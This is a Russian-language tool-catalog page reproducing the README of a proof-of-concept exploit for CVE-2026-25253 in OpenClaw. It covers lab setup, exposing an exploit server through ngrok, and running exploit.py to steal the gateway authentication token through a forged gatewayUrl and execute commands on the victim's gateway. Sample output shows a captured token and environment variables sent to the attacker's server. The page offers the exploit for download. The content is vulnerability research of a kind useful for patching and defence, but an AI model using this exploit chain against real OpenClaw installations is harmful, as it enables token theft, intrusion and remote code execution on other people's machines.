Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2026-25253 — OpenClaw Authentication Token Exfiltration | Kitploit
Инструменты/GitHubGitHub/eqstlab/cve-2026-25253
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingRed TeamingPayload Development
GitHubeqstlab/cve-2026-25253

CVE-2026-25253

OpenClaw Authentication Token Exfiltration

Репозиторий
23 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2026-25253 OpenClaw: RCE в один клик

★ CVE-2026-25253 OpenClaw: PoC эксплуатации удаленного выполнения кода в один клик ★

https://github.com/user-attachments/assets/e6957c61-7549-4e68-831e-a05436504a3e

Описание

CVE-2026-25253 : Уязвимость эксфильтрации токена аутентификации OpenClaw

Описание: OpenClaw (также известный как clawdbot или Moltbot) до версии v2026.1.29 позволяет злоумышленникам эксфильтровать сохраненный токен аутентификации шлюза, передавая поддельное значение параметра строки запроса gatewayUrl в интерфейс управления (Control UI), который автоматически устанавливает WebSocket-соединение без проверки или подтверждения пользователем. Это может привести к несанкционированному доступу к шлюзу и удаленному выполнению кода в один клик.

Требования

  • Docker (Docker Desktop на Windows)
  • Python 3.x (сторона атаки)

Файлы

  • Dockerfile — сборка уязвимого окружения OpenClaw
  • templates/ — вредоносные веб-страницы, используемые эксплойтом
  • config.txt — конфигурация OpenClaw, используемая в среде жертвы
  • exploit.py — сервер эксплойта
  • requirements.txt — зависимости PoC

Настройка окружения

  1. Сборка Docker-образа
root@kitploit:~
docker build -t openclaw-vuln .
  1. Запуск окружения (Windows)
root@kitploit:~
docker run -d --name openclaw-vuln -p 127.0.0.1:2222:22 openclaw-vuln
  1. Создание SSH-туннеля
root@kitploit:~
ssh-keygen -R [127.0.0.1]:2222
ssh -N -L 18789:127.0.0.1:18789 -p 2222 [email protected]
  • Пароль: openclawlab
  1. Доступ к интерфейсу управления OpenClaw Откройте следующий URL в браузере:
root@kitploit:~
http://127.0.0.1:18789/
  1. Введите токен шлюза d4b7c7689b82981ff86c735a9f8f616b310491b0d334659a1491c55a13353e66
  2. Нажмите Connect (Подключиться)
  3. Откройте вкладку Config (Конфигурация)
  4. Вставьте содержимое config.txt
  5. Замените поле API-ключа на ваш OpenAI API-ключ
  6. Сохраните конфигурацию
  7. Убедитесь, что агент отвечает нормально

Доказательство концепции (PoC)

  1. Установка зависимостей (сторона атаки)
root@kitploit:~
pip3 install -r requirements.txt
  1. Открытие сервера эксплойта через HTTPS
root@kitploit:~
wget https://bin.equinox.io/c/bNyj1mQVY4c/ngrok-v3-stable-linux-amd64.tgz
tar xzf ngrok-v3-stable-linux-amd64.tgz
./ngrok authtoken YOUR_TOKEN
./ngrok http 13337
  • Скопируйте сгенерированное имя хоста для переадресации
  1. Запуск сервера эксплойта
root@kitploit:~
python3 exploit.py --host YOUR_NGROK_HOSTNAME --command "env"

Пример:

root@kitploit:~
python3 exploit.py --host abcd-1234.ngrok-free.app --command "env"
  1. Запуск атаки
  1. Откройте вредоносную страницу, предоставленную сервером эксплойта
  2. Имитируйте взаимодействие жертвы со страницей
  3. Запустите поток эксплойта из браузера

Схема атаки

  1. Вредоносный URL изменяет gatewayUrl интерфейса управления жертвы
  2. Браузер автоматически подключается к WebSocket-конечной точке, контролируемой атакующим
  3. Токен аутентификации шлюза утекает к атакующему
  4. Вредоносная страница использует украденный токен для открытия нового WebSocket-соединения с локальным шлюзом OpenClaw жертвы
  5. Запрос на выполнение команды отправляется через агента
  6. Результат выполнения возвращается на сервер атакующего

Ожидаемый результат

  • Браузер жертвы перенаправляется в вредоносный WebSocket-поток
  • Токен аутентификации шлюза захватывается атакующим
  • Атакующий может отправить запрос на выполнение команды через OpenClaw
  • Вывод команды возвращается на сервер атакующего

Пример вывода

root@kitploit:~
[*] Exploit Server running on: abcd-1234.ngrok-free.app:13337
[*] Gateway token captured: d4b7c7689b82981ff86c735a9f8f616b310491b0d334659a1491c55a13353e66

==================================================
      [!] EXPLOIT RESULT CAPTURED [!]
==================================================
HOSTNAME=openclaw-vuln
PWD=/root
HOME=/root
...
==================================================

Примечания

  • Данный PoC нацелен на OpenClaw 2026.1.24-1
  • Цепочка эксплойта основана на уязвимой обработке gatewayUrl в интерфейсе управления
  • Для удаленного доступа жертвы вредоносная страница должна быть доступна по HTTPS
  • Локальный шлюз OpenClaw достигается через браузер жертвы в качестве моста

Аналитика EQST

Мы публикуем анализ CVE и вредоносного ПО раз в месяц. Если вам интересно, перейдите по ссылкам ниже, чтобы ознакомиться с нашими публикациями.

  • KR : https://www.skshieldus.com/security-insights/reports/eqst_openclaw_rce_vulnerability
  • EN : https://www.skshieldus.com/en/report?tab=eqst
Скачать инструмент